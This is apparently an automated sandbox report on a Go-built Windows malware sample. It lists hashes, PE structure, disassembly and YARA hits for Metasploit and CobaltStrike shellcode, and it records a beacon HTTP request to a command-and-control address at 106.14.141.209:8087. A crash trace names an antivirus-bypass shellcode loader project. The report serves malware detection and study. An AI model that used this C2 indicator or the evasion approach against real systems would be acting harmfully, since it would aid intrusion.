                    Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):1213
                    Entropy (8bit):4.942310874298255
                    Encrypted:false
                    SSDEEP:24:BF2sFq0vCRja73EWyv8rR6XafbaZzB2cjvG9wsZ0HaLQ8u/rFgFrl:Zc63PB6XR98n9ws6d8er+L
                    MD5:17EFF328E6554BCB6308F8B4D2A3F8EF
                    SHA1:E2E7BF7ECB1E881F1DC00F7C37A7E125724B486E
                    SHA-256:5F4E0A663969E10F8500DEDC85BAC32BFDD78FC09977E9C61AF27C78D1C86487
                    SHA-512:F87FF47532924CFD56CCA7241DCF4FA8402BB5EAA946BF0F9814CE5E10A3B24B9F60ACD478E7AF21563AB0D68A3A57FA90BD0770FD6EC717DA1070F8623F6411
                    Malicious:false
                    Reputation:low
                    Preview:Exception 0xc0000005 0x0 0x0 0x29c510f0030.PC=0x29c510f0030..runtime.cgocall(0x6dd2c0, 0x7f10a0)..F:/Base/Go/src/runtime/cgocall.go:157 +0x4a fp=0xc00007bcb8 sp=0xc00007bc80 pc=0x6832ca.syscall.SyscallN(0x29c510f0000?, {0xc00007bd50?, 0x3?, 0x68c467?})..F:/Base/Go/src/runtime/syscall_windows.go:538 +0x109 fp=0xc00007bd30 sp=0xc00007bcb8 pc=0x6d87c9.syscall.Syscall(0xc000004150?, 0xc000012200?, 0xc?, 0xc000112800?, 0xc000110700?)..F:/Base/Go/src/runtime/syscall_windows.go:476 +0x3b fp=0xc00007bd78 sp=0xc00007bd30 pc=0x6d85fb.main.main()..C:/Users/TianJing/Downloads/GobypassAV-shellcode-main/Base85+XOR+RC4/decode.go:52 +0x38a fp=0xc00007bf80 sp=0xc00007bd78 pc=0x725d4a.runtime.main()..F:/Base/Go/src/runtime/proc.go:250 +0x1fe fp=0xc00007bfe0 sp=0xc00007bf80 pc=0x6b53fe.runtime.goexit()..F:/Base/Go/src/runtime/asm_amd64.s:1571 +0x1 fp=0xc00007bfe8 sp=0xc00007bfe0 pc=0x6dba61.rax 0x0.rbx 0x29c510f01d6.rcx 0x0.rdi 0x0.rsi 0x0.rbp 0x29c510f000a.rsp 0xf9a47ff330.r8
                    File type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                    Entropy (8bit):6.9090934306154255
                    TrID:
                    • Win64 Executable (generic) (12005/4) 74.95%
                    • Generic Win/DOS Executable (2004/3) 12.51%
                    • DOS Executable Generic (2002/1) 12.50%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                    File name:SecuriteInfo.com.FileRepMalware.23518.16980.exe
                    File size:2'407'936 bytes
                    MD5:ea94a1fe3c2921313e7ea2b77675c7db
                    SHA1:dd0388d8bdfd510256f26a8e9efe025fd9381867
                    SHA256:ecbbb2801bb4d27db737c96ac45b2a51b449ddd9e2e2af42c1e85b79caa5a5ab
                    SHA512:75faeea680fea9fa1ba1980aceb9f7c85208664d568d3d4a45079eb64fa542228a8f204cd48075af86b6ff25f599e6b186c5965ebb6bc7c19e5e45151b062c81
                    SSDEEP:49152:9cUopVYb8CZgJEy4YqQD1qywbLTqFPO6KqMvdv2hSfrfX:jByQywfTYm6K7Aq
                    TLSH:1EB58D06BC9570B6CAE99232897592A03731B8490F3167C32E11B7BA3F767D41F753A8
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........x"......."......N....................@...............................*...........`... ............................
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x45d100
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows cui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:1
                    File Version Major:6
                    File Version Minor:1
                    Subsystem Version Major:6
                    Subsystem Version Minor:1
                    Import Hash:9cbefe68f395e67356e2a5d8d1b285c0
                    Instruction
                    jmp 00007F09D4EBB820h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    pushfd
                    cld
                    dec eax
                    sub esp, 000000E0h
                    dec eax
                    mov dword ptr [esp], edi
                    dec eax
                    mov dword ptr [esp+08h], esi
                    dec eax
                    mov dword ptr [esp+10h], ebp
                    dec eax
                    mov dword ptr [esp+18h], ebx
                    dec esp
                    mov dword ptr [esp+20h], esp
                    dec esp
                    mov dword ptr [esp+28h], ebp
                    dec esp
                    mov dword ptr [esp+30h], esi
                    dec esp
                    mov dword ptr [esp+38h], edi
                    movups dqword ptr [esp+40h], xmm6
                    movups dqword ptr [esp+50h], xmm7
                    inc esp
                    movups dqword ptr [esp+60h], xmm0
                    inc esp
                    movups dqword ptr [esp+70h], xmm1
                    inc esp
                    movups dqword ptr [esp+00000080h], xmm2
                    inc esp
                    movups dqword ptr [esp+00000090h], xmm3
                    inc esp
                    movups dqword ptr [esp+000000A0h], xmm4
                    inc esp
                    movups dqword ptr [esp+000000B0h], xmm5
                    inc esp
                    movups dqword ptr [esp+000000C0h], xmm6
                    inc esp
                    movups dqword ptr [esp+000000D0h], xmm7
                    dec eax
                    sub esp, 30h
                    dec ecx
                    mov edi, eax
                    dec eax
                    mov edx, dword ptr [00000028h]
                    dec eax
                    cmp edx, 00000000h
                    jne 00007F09D4EBF4AEh
                    dec eax
                    mov eax, 00000000h
                    jmp 00007F09D4EBF525h
                    dec eax
                    mov edx, dword ptr [edx+00000000h]
                    dec eax
                    cmp edx, 00000000h
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2860000x47c.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2870000x2e3c.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x1562200x140.data
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000xa4d900xa4e002114996714e50068dfa6488b100672cfFalse0.45603765873768004data6.18924062305756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0xa60000xafff00xb0000280090d388b88bc7ad9446e8f0036935False0.4012686989524148data5.3260154839437455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x1560000x73ea00x18000c139068775b55bb5887ae3ad1c031551False0.3939412434895833data4.611186910610202IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    /40x1ca0000x1270x20043dc7a0ae5a7067502907db800396667False0.6171875data5.097874074212899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /190x1cb0000x1f15c0x1f200a5082d32ba749de000d4c096f6ea8c67False0.9934974272088354data7.992062259347675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /320x1eb0000x599f0x5a0025da92f88190240ca5a5c424fe39b0aeFalse0.9958333333333333data7.926076700406343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /460x1f10000x270x200e3c686c1e9fc992a4ad08d9ebc8a8364False0.0859375data0.706281805748948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /650x1f20000x699550x69a0093ca2dd031c76f2741fc6d8fee5e0a2eFalse0.9972217085798817data7.99767609028745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /780x25c0000x1f1ef0x1f200da3acf57134fee9b24b6996fd9274a7cFalse0.9679969879518072data7.987802316638694IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    /900x27c0000x91630x9200fcc996d775c1e032bd5a6a9169d14e06False0.9744488441780822data7.788007124940507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .idata0x2860000x47c0x60040ddbb53e57d8e9741f88746c888c315False0.3313802083333333data3.520510903145283IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc0x2870000x2e3c0x30002eabf79e4217edd339301fd1cdd4ddadFalse0.3770345052083333data5.373007243001511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    .symtab0x28a0000x244430x24600686f67828ec537f91db1333a8ab6d21bFalse0.24097938144329897data5.238010156875437IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    DLLImport
                    kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 28, 2024 22:26:02.134365082 CEST497018087192.168.2.10106.14.141.209
                    Sep 28, 2024 22:26:02.139309883 CEST808749701106.14.141.209192.168.2.10
                    Sep 28, 2024 22:26:02.139400005 CEST497018087192.168.2.10106.14.141.209
                    Sep 28, 2024 22:26:02.139569998 CEST497018087192.168.2.10106.14.141.209
                    Sep 28, 2024 22:26:02.144712925 CEST808749701106.14.141.209192.168.2.10
                    Sep 28, 2024 22:26:23.513449907 CEST808749701106.14.141.209192.168.2.10
                    Sep 28, 2024 22:26:23.513541937 CEST497018087192.168.2.10106.14.141.209
                    Sep 28, 2024 22:26:23.513778925 CEST497018087192.168.2.10106.14.141.209
                    Sep 28, 2024 22:26:23.518942118 CEST808749701106.14.141.209192.168.2.10
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 28, 2024 22:26:34.627815962 CEST5350279162.159.36.2192.168.2.10
                    Sep 28, 2024 22:26:35.114304066 CEST4946953192.168.2.101.1.1.1
                    Sep 28, 2024 22:26:35.128185034 CEST53494691.1.1.1192.168.2.10
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Sep 28, 2024 22:26:35.114304066 CEST192.168.2.101.1.1.10x2f27Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Sep 28, 2024 22:26:35.128185034 CEST1.1.1.1192.168.2.100x2f27Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                    • 106.14.141.209:8087
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.1049701106.14.141.20980877872C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe
                    TimestampBytes transferredDirectionData
                    Sep 28, 2024 22:26:02.139569998 CEST175OUTGET /hkDF HTTP/1.1
                    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
                    Host: 106.14.141.209:8087
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Click to jump to process

                    Click to jump to process

                    Click to jump to process

                    Target ID:0
                    Start time:16:26:01
                    Start date:28/09/2024
                    Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe"
                    Imagebase:0x680000
                    File size:2'407'936 bytes
                    MD5 hash:EA94A1FE3C2921313E7EA2B77675C7DB
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:Go lang
                    Yara matches:
                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:16:26:01
                    Start date:28/09/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff620390000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:0.4%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:9
                      Total number of Limit Nodes:1
                      execution_graph 11646 29c510f0109 11647 29c510f011c InternetConnectA 11646->11647 11648 29c510f0181 11647->11648 11648->11647 11650 29c510f012d HttpOpenRequestA 11648->11650 11651 29c510f019c 11648->11651 11653 29c510f0128 11648->11653 11652 29c510f014f 11650->11652 11654 29c510f012d HttpOpenRequestA 11653->11654 11655 29c510f014f 11654->11655 11655->11648

                      Control-flow Graph

                      APIs
                      • InternetConnectA.WININET(00000003,00000003,00000002,00000001), ref: 0000029C510F0124
                        • Part of subcall function 0000029C510F0128: HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 0000029C510F0143
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029C510F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_29c510f0000_SecuriteInfo.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConnectHttpInternetOpenRequest
                      • String ID: U.;
                      • API String ID: 1341064763-4213443877
                      • Opcode ID: 68cff7655bd4aeab329f58e5418a888a89b77a2ed6238346b8879eb87c52e368
                      • Instruction ID: 6a3a7fc491ffde345bfb587df6d91f69f21af8a4241dd8ec611ca7d3105a0653
                      • Opcode Fuzzy Hash: 68cff7655bd4aeab329f58e5418a888a89b77a2ed6238346b8879eb87c52e368
                      • Instruction Fuzzy Hash: EB51ED6926CA906BF3A5873C894F3B73BC6EBD2304FF9429DD08197297D550E802C3A5

                      Control-flow Graph

                      APIs
                      • HttpOpenRequestA.WININET(00000000,00000000,84400200,00000000), ref: 0000029C510F0143
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000029C510F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_29c510f0000_SecuriteInfo.jbxd
                      Yara matches
                      Similarity
                      • API ID: HttpOpenRequest
                      • String ID: U.;
                      • API String ID: 1984915467-4213443877
                      • Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                      • Instruction ID: abf898ee9b3798b7c373c0f4dc28a90a2d134338f3d2807847d76210687a7dbf
                      • Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
                      • Instruction Fuzzy Hash: 1C11796034980D0BF66895AE7C9A73B11CBD7D8765F75822FB40ED33D9ED54CC82812A

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 57 6a7000-6a700c 58 6a7b99-6a7bb2 call 6d9860 57->58 59 6a7012-6a7097 57->59 58->57 61 6a70c0-6a70c4 59->61 63 6a70ca-6a7114 61->63 64 6a71d8-6a71e7 61->64 65 6a711a-6a7123 63->65 66 6a7b90-6a7b98 call 6dbfc0 63->66 67 6a7458-6a7460 call 6dbf60 64->67 68 6a71ed-6a7217 call 6a9900 64->68 70 6a7b88-6a7b8b call 6dc000 65->70 71 6a7129-6a7197 65->71 66->58 74 6a7465-6a746b 67->74 82 6a72bf-6a72e3 68->82 83 6a721d-6a72be call 6a6f20 68->83 70->66 75 6a7199-6a71a0 71->75 76 6a71a2 71->76 80 6a7475-6a7478 74->80 81 6a71a5-6a71d3 75->81 76->81 86 6a747e-6a7480 80->86 87 6a76e0-6a76e3 80->87 81->80 84 6a72e9-6a7311 82->84 85 6a7453 call 6dbf40 82->85 90 6a743c-6a7449 84->90 91 6a7317-6a7326 84->91 85->67 92 6a7b7d-6a7b83 call 6dbf40 86->92 93 6a7486-6a748d 86->93 94 6a76e9-6a76ec 87->94 95 6a798f-6a7a00 call 6a6f20 87->95 90->85 97 6a732c-6a7428 call 6b4520 call 6b4e20 call 6b4c20 call 6b4e20 call 6b4c20 call 6b4e20 call 6b4b20 call 6b4e20 call 6b4b20 call 6b4e20 call 6b4b20 call 6b4e20 call 6b45a0 call 6b4520 call 6b4e20 call 6b4b20 call 6b4780 call 6b45a0 call 6b2d80 91->97 98 6a742d-6a7437 91->98 92->70 99 6a748f-6a7491 93->99 100 6a7493-6a754a 93->100 102 6a76f2-6a771c 94->102 103 6a7976-6a798e 94->103 97->98 99->74 114 6a767d-6a76d8 100->114 115 6a7550-6a7555 100->115 107 6a771e-6a7724 102->107 108 6a7726-6a7742 102->108 112 6a7749-6a7753 107->112 108->112 116 6a775d-6a7761 112->116 117 6a7755-6a775b 112->117 114->87 120 6a755e-6a756e 115->120 121 6a7557-6a755c 115->121 118 6a7768-6a7ae3 call 6b4520 call 6b4e20 call 6b4c20 call 6b4e20 call 6b4c20 call 6b4e20 call 6b4b20 call 6b4e20 call 6b4b20 call 6b4e20 call 6b4b20 call 6b4780 call 6b45a0 call 6b4520 call 6b4e20 call 6b4c20 call 6b4e20 call 6b4b20 call 6b4e20 call 6b4c20 call 6b4780 call 6b45a0 call 6b4520 call 6b4e20 call 6b4c80 call 6b4e20 call 6b4c20 call 6b4780 call 6b45a0 call 6b4520 call 6b4e20 call 6b4b20 call 6b4e20 call 6b4b20 call 6b4780 call 6b45a0 116->118 117->118 239 6a7ae9-6a7b1a 118->239 240 6a7b6c-6a7b78 call 6b2d80 118->240 124 6a7571-6a7574 120->124 121->124 127 6a757a-6a757d 124->127 128 6a7099-6a70b8 124->128 129 6a758b-6a75a6 127->129 130 6a757f-6a7589 127->130 128->61 134 6a7628-6a7678 129->134 135 6a75ac 129->135 133 6a75b1 130->133 138 6a75be-6a75c8 133->138 139 6a75b3-6a75bc 133->139 134->74 135->133 143 6a75cc-6a7623 138->143 139->143 143->74 241 6a7b1c-6a7b22 239->241 242 6a7b24-6a7b3c 239->242 240->92 244 6a7b3f-6a7b51 241->244 242->244 245 6a7b5d-6a7b61 244->245 246 6a7b53 244->246 245->240 246->245
                      Strings
                      • runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong, xrefs: 006A781E
                      • bad summary databad symbol tablecastogscanstatuscontext canceledgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-, xrefs: 006A741C, 006A7B6C
                      • , i = , not 390625<-chanAnswerArabicBitBltBrahmiCarianChakmaCommonCopticEndDocFormatGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLycianLydianMulDivRejangSCHED SaveDCStringSyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UT, xrefs: 006A78C5
                      • , j0 = 19531259765625AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanEllipseElymaicEndPageFillRgnFreeSidGODEBUGGranthaHanunooIO waitIsChildKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSetMenuSetRectSharadaShavianSiddhamSinhalaSleepExSogdianS, xrefs: 006A785A
                      • , levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregisterEventSourceDwmGetWi, xrefs: 006A7945
                      • ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinf, xrefs: 006A7356, 006A7799
                      • ] = (arrayclosedeferfalsefaultgFreegcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= , xrefs: 006A7374
                      • runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning boolea, xrefs: 006A7925
                      • runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaning bytes failed with errno= to unused region of span2910383045673370361328125AUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironm, xrefs: 006A78A5
                      • runtime: npages = runtime: range = {runtime: textAddr streams pipe errorsystem page size (tracebackancestorsuse of closed filevalue out of rangewglUseFontBitmapsW [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=1490116119384765625745, xrefs: 006A73EF
                      • , ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanI, xrefs: 006A738F, 006A73AF, 006A77CF, 006A77EF
                      • , npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDestroyIconDestroyMenuDives_AkuruDrawMenuBarDrawTextExWEnumWindowsExitProcessFindWindowWFreeLibraryGOTRACEBACKGetAncestorGetCaretPosGetFileTypeGetIcon, xrefs: 006A783C
                      • ] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindpipepop3profrootsbrksmtpsse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-, xrefs: 006A77B4
                      • runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong medium type but memory size because dotdotdot in, xrefs: 006A733B, 006A7772
                      • ), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa, xrefs: 006A73CF
                      • ~~j, xrefs: 006A7BA8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
